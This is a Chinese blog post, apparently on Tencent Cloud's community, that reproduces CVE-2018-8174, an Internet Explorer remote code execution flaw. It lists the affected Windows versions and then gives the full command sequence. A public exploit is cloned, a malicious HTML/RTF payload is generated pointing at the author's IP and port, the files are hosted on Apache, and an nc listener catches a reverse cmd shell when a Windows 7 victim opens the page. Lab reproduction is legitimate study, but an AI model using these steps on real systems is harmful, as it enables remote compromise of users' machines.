首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2018-8174 IE浏览器远程代码执行漏洞

CVE-2018-8174 IE浏览器远程代码执行漏洞

作者头像
剧终
发布2020-08-26 22:18:51
4280
发布2020-08-26 22:18:51
举报
文章被收录于专栏:Linux学习日志Linux学习日志

漏洞简介

这个漏洞的影响范围为

Windows 7
Windows Server 2012 R2
Windows RT 8.1 
Windows Server 2008
Windows Server 2012
Windows 8.1
Windows Server 2016
Windows Server 2008 R2
Windows 10
Windows 10 Servers.

基本上影响了所有的高版本windows

复现漏洞

首先到github上面找exp然后克隆到本地

git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
请输入图片描述
请输入图片描述

然后生成payload 192.168.2.117是自己的ip 端口号是1000

cd CVE-2018-8174_EXP
python CVE-2018-8174.py -u 192.168.2.117/exploit.html -o test.rtf -i 192.168.2.117 -p 1000  

然后就能看到生成了两个文件一个html一个rtf文件

请输入图片描述
请输入图片描述

然后把这个exploit.html和test.rtf扔到网站目录下

mv exploit.html test.rtf /var/www/html/

启动apache

service apache2 start

启动nc监听刚才设置的端口

nc -vv -lp 1000

然后使用windows7打开ie浏览器访问

http://192.168.2.117/exploit.html

*然后ie浏览器并不会正常显示这个页面 但是攻击已经成功了

请输入图片描述
请输入图片描述

此时我们去看看我们的nc已经成功的拿到了反弹回来的cmd了

请输入图片描述
请输入图片描述
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 复现漏洞
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档